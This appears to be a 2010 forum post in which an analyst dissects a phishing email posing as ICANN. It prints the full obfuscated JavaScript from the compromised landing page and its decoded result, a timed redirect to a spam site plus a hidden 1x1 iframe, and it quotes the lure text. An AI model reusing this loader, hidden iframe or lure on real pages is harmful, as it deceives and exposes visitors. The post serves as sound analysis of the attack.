Subject: Your Domain Has Been Suspended
From: "ICANN Services" <alert
@icann.org>
Letter from ICANN (the Internet Corporation for Assigned Names And Numbers)
Your Domain Has Been Suspended.
Click here for more information:
http
://booksalon.kr/index2.html
Please contact billing/support center A.S.A.P
[email protected]booksalon.kr is of course another compromised server. Index2.html contains some of the more ridiculous obfuscation these attackers use. I'll wrap it for legibility.
var EWgUi ;EWgUi= '' ; var DD , Gz,KpsHj;if (KpsHj<DD || DD<Gz){DD=Gz-
KpsHj;}var mGdujq=this ; var VvIf =''+'replace' ; var XMdHkJ; XMdHkJ
='';XMdHkJ =
'9sdU7i2i2sfs8NcN2i3Ncs8ses9N4N3seN5N8N0NcN1N8i3NeN2N0i2N4N3N9N8s5i3sd
N'; var KqO, XZoWC ;var zt ; zt= 339 ;if (KqO==XZoWC){KqO=
XZoWC+zt;}var HcxN= 'sfU3'; var qxSH;qxSH='';qxSH =
'N9N2Nes8N0N8N3s9i3sasfN4s9N8i5ifmagcg4m9idU9idmeg8geg2g3g9i3i3i3U1N0N
8s9NcidN5s9s9sdi0N8scs8N4sbU0m1ifsfN8NbsfN8seN5m1ifidNeN2N3s9N8'; var
fKVrBy;fKVrBy ='Uciaidses9s4N1N8U0iasbN4seN';var Ywfno='ydbqw'; var
cAT=252;var MmIj=479;var OGy ; OGy =931 ; if
(cAT>MmIj){cAT=MmIj+OGy;}var fh ;fh ='';var emnJ , aBhJ , vAE ;if
(vAE>emnJ && emnJ<=aBhJ){emnJ=aBhJ+vAE; }fh =
'ciaidN5N8N4NaN5s9U0ia';var oyGzhN ;oyGzhN = '';var GADYNJ, LkVmEI
;var BUPZxW =446; if (BUPZxW<GADYNJ || GADYNJ>=LkVmEI){GADYNJ =LkVmEI
- BUPZxW; }oyGzhN ='4U6' ; var qXO;qXO= 582 ; var AH = 23;var cP= 720;
if (cP<qXO || qXO<=AH){qXO = AH-cP ; }var EBMxEe=
'5sdU2sdN4N9U0UcUdiai';var OKh ,Km;var OmPz =766; if (OmPz= OKh ||
OKh==Km){OKh=Km+OmPz;}var Illshy ;Illshy ='' ; Illshy
='4N9N9N8N3U6';var MET;MET = ''; var XlM , VnFIU,wRL ; if (wRL<XlM &&
XlM>=VnFIU){XlM =VnFIU+wRL ; }MET='m1ifidi2U3U1N4Nb'; var kCEEn =198 ;
var mHR, GhGv ; if (kCEEn==mHR){kCEEn =mHR^GhGv; }var ZgM=
'IvxLRJCcKGfDMW' ;var HtaU;HtaU ='4NfN4N1N4s9s4U7idN5N'; var etHAM=
'ifi' ; var fnYhiV= 'MrCP';var MIL ;MIL = '' ;var kR= 109; var Cbq,
eMTx; if (kR>Cbq){kR = Cbq^eMTx ;}MIL = 'dsaN4N9s9N5U0iaU' ;var
KBL='sfNcN0N8idsesfNeU0iaN5s9s';var TAcsH= 231 ; var jBEgFQ; jBEgFQ =
173 ;var xjtMSO= 637; if (xjtMSO>TAcsH || TAcsH<jBEgFQ){TAcsH =
jBEgFQ/xjtMSO ;}var BdkA ='CJYbypzeBpaTqdGYi';var Ilj= '3U1i2N4N';var
HqP; HqP ='iaU' ;var BazxfH ,QaK ,INxI ; if (INxI= BazxfH ||
BazxfH>QaK){BazxfH = QaK-INxI; }var iZj='rWbbcUOmoAzXl';var LwQ;LwQ=
'1Nf' ;var zbRlIK ='uzpFLWMkxKHVQhc'; var HjN =767 ;var cE;cE =
513;var ZmmMl; ZmmMl=480;if (HjN<=cE){HjN = cE+ZmmMl; }var aCn
='N3s9U0m1ifU9U6s8sfN1U0N5s9s9sdU7i2i2N2NeNes8sfN1N8Ncses9i3NeN2N0' ;
var HcCux ='blJhHhEbWEoNlD'; var Xsx,YPgqhV ; var XPGpZ ;XPGpZ =184;
if (Xsx>=YPgqhV){Xsx= YPgqhV^XPGpZ ;}function ltY(pEs){var pEa =
EWgUi;for(mo =0 ; mo<pEs['lGeNnGgNtThG'[VvIf](/[GzTNV]/g , EWgUi)];
++mo){pEa=pEa+mGdujq['SotorFidndgo'[VvIf](/[odCTF]/g,
EWgUi)]['fDrqoqmQCqhQaQrQCqoqdsel'[VvIf](/[lsqDQ]/g
,EWgUi)](13^pEs['cuhnaurLCnozdSeuALtn'[VvIf](/[nSuzL]/g,EWgUi)](mo)) ;
}return pEa;}var uvwUAp = 'bsfNcN0N8U3U'; var mwRD ; mwRD=EWgUi;var
aCMjf = qxSH+aCn ;aCMjf=aCMjf+MET+KBL;aCMjf= aCMjf+XMdHkJ;
aCMjf=aCMjf+EBMxEe;aCMjf=aCMjf+MIL+fh ;aCMjf =aCMjf+fKVrBy;aCMjf
=aCMjf+HtaU ; aCMjf = aCMjf+Illshy; aCMjf= aCMjf+HqP+Ilj+uvwUAp+LwQ
;aCMjf = aCMjf+HcxN+etHAM+oyGzhN+mwRD; var BEQHEO=
'CmV5Bto1ciL2Msj7ewa0ANE6PUW3ZxF9fyT8dgQ4'[VvIf](/[CBcMeAPZfd]/g,'\%')
[VvIf](/[VoLjaEWFTQ]/g , '\¹');var gLM ,ogzW ;var YhEv = 531 ;if
(YhEv= gLM && gLM>ogzW){gLM =ogzW^YhEv; }var MwqIkO="')[VvIf](/[";var
nsPtv= "]/g,'%"; var GHDCO
=BEQHEO[VvIf](/[\%]/g,MwqIkO)[VvIf](/[\¹]/g, nsPtv) ;var dnAJz; dnAJz
=VvIf ;mGdujq['eyvZaZlN'[dnAJz](/[NZbyg]/g ,EWgUi)]('var IuO=
aCMjf'+GHDCO['sTuwbwswtMrMiUnLgw'[VvIf](/[wUTLM]/g, EWgUi)](2 ,
GHDCO['lbeNnbgstNhZ'[VvIf](/[ZNbsq]/g, EWgUi)])+"') ;var kX= 429; var
rB ,vTS; if (kX==rB){kX=rB^vTS ;}") ;var LmNE, MarhR;var Sf = 883 ;if
(Sf>LmNE || LmNE==MarhR){LmNE
=MarhR+Sf;}mGdujq['euvLaulm'[VvIf](/[muzLc]/g,
EWgUi)](ltY(mGdujq[['uhnKehsKcKaKpleo'[VvIf](/[oKhlE]/g,
EWgUi)]](IuO))); var ryCbCw=950 ;var ZgYL , vGF;if
(ryCbCw>ZgYL){ryCbCw =ZgYL+vGF;}
That looks more confusing than it is. They obfuscate the actual javascript commands but it's still a really obvious and easy thing to get past.
document.write("WAIT 4 SECOND...<meta http-equiv=\"refresh\" content=\"4;url=http://occurleast.com\" />
<iframe src='http://ruao.austinshemale.com/index.php?pid=10' width='1' height='1' style='visibility: hidden;'>
</iframe><br>");
So: they go to all this trouble, lying about being ICANN, lying about "your domain" being suspended, then presenting ridiculously obfuscated javascript... to send you to another Spamit site? What a waste of time.
Oddly enough, occurleast is not hosted via fast flux, but it has six (6) DNS servers. Somebody must have been burned in the past.
The austinshemale.com iframe is blank, possibly just to track visits.
Just another really stupid attempt. Who on earth would be clicking through this garbage and actually buying anything?!
Posted: Wed Jun 23, 2010 10:34 am 
